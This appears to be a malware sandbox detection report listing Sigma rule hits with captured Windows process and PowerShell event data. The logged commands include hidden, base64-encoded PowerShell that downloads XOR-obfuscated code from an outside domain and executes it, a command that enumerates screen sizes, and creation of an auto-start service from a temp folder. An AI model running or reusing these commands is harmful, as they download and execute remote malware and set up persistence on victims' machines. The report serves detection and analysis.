CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5048, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c "STaRT /MiN "" POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA=="" && exit, ProcessId: 7336, ProcessName: cmd.exe

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA, CommandLine: powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA, CommandLine|base64offset|contains: +, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 540, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGI

Sigma detected: Suspicious New Service Creation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe nonbo1" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe nonbo1" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe nonbo1" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2324, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe nonbo1" start= auto , ProcessId: 3012, ProcessName: sc.exe

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA, CommandLine: powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA, CommandLine|base64offset|contains: +, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 540, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGI

Sigma detected: Suspicious PowerShell Invocations - Specific - PowerShell Module

Source: Event Logs

Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro: Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1151 Host ID = 9302f206-bf8d-42d1-902b-7ea913c97473 Host Application = powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= Engine Version = 5.1.19041.1151 Runspace ID = 3532a455-808b-47b3-b9c1-796734fbfffa Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = computer\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.Windows.Forms", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1151 Host ID = 9302f206-bf8d-42d1-902b-7ea913c97473 Host Application = powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA= Engine Version = 5.1.19041.1151 Runspace ID = 3532a455-808b-47b3-b9c1-796734fbfffa Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = computer\user Connected User = Shell ID = Microsoft.PowerShell, data1: , data2: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.Windows.Forms"

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7708, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=, ProcessId: 7084, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA, CommandLine: powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA, CommandLine|base64offset|contains: +, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 540, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGI

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA==" , CommandLine: POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA==" , CommandLine|base64offset|contains: <(D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "STaRT /MiN "" POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA=="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7336, ParentProcessName: cmd.exe, ProcessCommandLine: POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA==" , ProcessId: 4012, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

